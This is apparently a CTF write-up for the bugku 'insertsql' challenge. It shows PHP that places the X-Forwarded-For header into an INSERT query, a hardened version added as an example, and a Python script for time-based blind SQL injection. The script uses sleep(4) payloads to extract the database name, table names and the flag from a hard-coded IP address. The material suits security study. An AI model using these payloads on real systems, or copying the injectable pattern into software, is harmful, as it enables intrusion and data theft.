bugku insertsql

Posted by liqik


Challenge link


0x00 The PHP code given by the challenge

<?php
error_reporting(0);

function getIp()
{
    $ip = '';
    if(isset($_SERVER['HTTP_X_FORWARDED_FOR']))
        $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
    else
        $ip = $_SERVER['REMOTE_ADDR'];

    $ip_arr = explode(',', $ip);
    return $ip_arr[0];
}

$host="localhost";
$user="";
$pass="";
$db="";

$connect = mysql_connect($host, $user, $pass) or die("Unable to connect");

mysql_select_db($db) or die("Unable to select database");

$ip = getIp();
echo 'your ip is :'.$ip;
$sql="insert into client_ip (ip) values ('$ip')";  // insert the obtained IP into the database
mysql_query($sql);


0x01 INSERT SQL injection vulnerability

Inserting a message into the database

Where it typically shows up: an e-commerce order-creation API with an INSERT-type SQL injection flaw lets the order amount be modified. Creating an order inserts a row into the database, but here the insert is built as a dynamic query string, so injected data can tamper with the stored order.


In this challenge the injection point is X_FORWARDED_FOR (the X-Forwarded-For header read by getIp()).
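As an added example (not part of the original writeup or the challenge code), the same IP-logging logic hardened on the defender's side: the X-Forwarded-For header is only honoured when the request arrived through a trusted proxy, the value is validated as an IP address, and the insert uses a prepared statement so the value can never become part of the SQL text. The `$trusted_proxies` list, the mysqli connection details and the function names are assumptions for this example.

```php
<?php
// Added example, not the challenge's code. Assumes a mysqli-capable PHP build
// and the same placeholder database credentials as the challenge.

// Return the client IP. X-Forwarded-For is attacker-controlled unless the
// request came through a proxy we operate, so it is only used in that case,
// and only the first hop is accepted, and only if it parses as an IP address.
function getClientIp(array $server, array $trusted_proxies): string
{
    $remote = $server['REMOTE_ADDR'] ?? '';
    if (!empty($server['HTTP_X_FORWARDED_FOR']) && in_array($remote, $trusted_proxies, true)) {
        $first = trim(explode(',', $server['HTTP_X_FORWARDED_FOR'])[0]);
        if (filter_var($first, FILTER_VALIDATE_IP) !== false) {
            return $first;
        }
    }
    return $remote;
}

// Store the IP with a prepared statement: the value travels separately from
// the SQL text, so quotes, subqueries or sleep() calls in $ip stay plain data.
function storeClientIp(mysqli $conn, string $ip): bool
{
    $stmt = $conn->prepare('INSERT INTO client_ip (ip) VALUES (?)');
    if ($stmt === false) {
        return false;
    }
    $stmt->bind_param('s', $ip);
    $ok = $stmt->execute();
    $stmt->close();
    return $ok;
}

$conn = new mysqli('localhost', '', '', '');
if ($conn->connect_error) {
    die('Unable to connect');
}

// Assumed deployment: only a local reverse proxy is allowed to set the header.
$trusted_proxies = ['127.0.0.1'];

$ip = getClientIp($_SERVER, $trusted_proxies);
// Escape on output as well, since the value is reflected into the page.
echo 'your ip is :' . htmlspecialchars($ip, ENT_QUOTES, 'UTF-8');
storeClientIp($conn, $ip);
```

With this version the time-based payloads used later in the writeup are stored as literal strings (or rejected outright by `filter_var`), and the `sleep(4)` never executes, so the timeout side channel the script relies on disappears.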


0x02 Python script:

import requests
import sys
import string

def getdblen(url):  # get the length of the database name
    sql = "1'+(select case when(select length(database())={0}) then sleep(4) else 1 end) and '1'='1"
    for i in range(1, 50):
        header = {"X-Forwarded-For": sql.format(str(i))}
        try:
            s = requests.get(url, headers=header, timeout=3)
        except requests.exceptions.RequestException:  # a timeout means sleep(4) fired, i.e. the guess was right
            print("database name len:", i)
            break

def gettablelen(url):  # get the length of the table names. No output, I don't know where the error is, very annoying~~, can't find the error. With or without limit there is no output
    # limit picks a few rows out of several; limit 1,1 means one row starting at the second row (rows are counted from 0)
    sql = "'+(select case when(select length((select table_name from information_schema.tables where table_schema=database() limit {0},1))={1}) then sleep(4) else 1 end) and '1'='1"
    for n in range(0, 5):
        for i in range(1, 20):
            header = {"X-Forwarded-For": sql.format(str(n), str(i))}
            try:
                s = requests.get(url, headers=header, timeout=3)
            except requests.exceptions.RequestException:
                print("table %s name len:%d" % (n, i))
                break

def getdb(url):
    database_name = ''
    sql = "1' and (case when (substr((select database()) from {0} for 1)='{1}') then sleep(4) else 1 end) and '1'='1"
    # crack the database name one character at a time; {0} and {1} mark the two variables filled in by the format call below
    for i in range(1, 10):  # guess that the database name is within 9 characters
        for c in range(32, 129):  # loop through and match each character
            if c == 128:
                sys.exit(0)  # nothing matched, so exit
            header = {"X-Forwarded-For": sql.format(i, chr(c))}
            try:
                s = requests.get(url, headers=header, timeout=3)
            except requests.exceptions.RequestException:
                database_name += chr(c)
                print(database_name)
                break
    return database_name

def gettable(url):
    table_name = ''
    payload = "'+(select case when (substr((select group_concat(table_name) from information_schema.tables where table_schema=database()) from {0} for 1)='{1}') then sleep(4) else 1 end) and '1'='1"
    guess = string.ascii_lowercase + string.ascii_uppercase + string.digits + string.punctuation
    for i in range(1, 50):
        # print(i)
        for c in guess:
            if ord(c) == 128:
                sys.exit(0)
            header = {"X-Forwarded-For": payload.format(i, c)}
            try:
                s = requests.get(url, headers=header, timeout=3)
            except requests.exceptions.RequestException:
                table_name += c
                print(table_name)
                break
    return table_name

def getcolumn(url):
    column_name = ''
    sql = "'+(select case when (substr((select group_concat(column_name) from information_schema.columns where table_name='flag') from {0} for 1)='{1}') then sleep(4) else 1 end) and '1'='1"
    # guess = string.ascii_lowercase + string.ascii_uppercase + string.digits + string.punctuation
    for i in range(20):
        for c in range(32, 129):
            if c == 128:
                sys.exit(0)
            payload = {"X-Forwarded-For": sql.format(i, chr(c))}
            try:
                s = requests.get(url, headers=payload, timeout=3)
            except requests.exceptions.RequestException:
                column_name += chr(c)
                print(column_name)
                break
    return column_name

def getmessage(url):
    message = ''
    sql = "'+(select case when(substr((select group_concat(flag) from flag) from {0} for 1)='{1}') then sleep(4) else 1 end) and '1'='1"
    for i in range(1, 35):
        for c in range(32, 129):
            if c == 128:
                sys.exit(0)
            payload = {"X-Forwarded-For": sql.format(i, chr(c))}
            try:
                s = requests.get(url, headers=payload, timeout=3)
            except requests.exceptions.RequestException:
                message += chr(c)
                print(message)
                break
    return message


if __name__ == "__main__":
    url = "http://123.206.87.240:8002/web15/"
    print(getdb(url))
    # tablename = gettable(url)
    # print(tablename)
    # columname = getcolumn(url)
    # message = getmessage(url)

    # print(temp.lower())
    # getdblen(url)
    # gettablelen(url)
    # getdb(url)

The code borrows from other people's writeups, with a few ideas of my own added, such as querying the name lengths.


Summary: I need to improve my script-writing ability and study more MySQL statements; several statements failed to inject because they were wrong.
